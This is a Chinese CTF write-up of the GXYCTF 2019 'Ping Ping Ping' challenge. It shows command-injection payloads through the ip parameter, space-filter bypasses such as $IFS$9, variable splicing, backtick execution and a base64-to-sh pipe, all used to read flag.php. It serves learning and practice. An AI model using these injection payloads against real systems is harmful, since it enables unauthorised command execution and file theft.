本站vip特权 - 全站资源免费下载

限时特惠

GXYCTF 2019 | 题目解析之Ping Ping Ping

Ping Ping Ping

进入题目%title插图%num

肯定先Ping一下本地IP:127.0.0.1
%title插图%num能连接上

然后用**ls**关键字列出当前目录的内容

1621431914_60a5166ab09adfcf9393c.png!small?1621431914356接着我们肯定想查看flag.php里面的值
用**cat**命令查看文件内容,
还有其他查看命令主要是tac,head,more,tail,less
%title插图%num显示空格被过滤了;
一般空格过滤绕过的方法:

{cat,flag};   ${IFS$;   $IFS$9;   <;   <>;

经过测试用空格用**$IFS$9**绕过;
然后变量**拼接,倒序**得到payload:

?ip=127.0.0.1;a=ag;b=fl;cat$IFS$1$b$a.php
也可以?ip=127.0.0.1;a=lag;cat$IFS$9f$a.php

1621432029_60a516ddb83e9343a6f5d.png!small?1621432029374

解法2:

内联执行绕过
将**反引号内**命令的输出作为输入执行

?ip=|cat$IFS$9`ls`

解法3:

虽然过滤了bash,但没过滤sh,可以使用下面的方法:

ip=1;echo$IFS$9Y2F0IGZsYWcucGhw|base64$IFS$9-d|sh

推荐写的***很好***的关于此类题目的文章

https://www.codenong.com/cs105422347/

WEB安全

“不拔网线”是HVV蓝军的底裤和尊严

2021-6-1 13:59:39

WEB安全

VulnHub渗透测试

2021-6-2 15:40:29

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索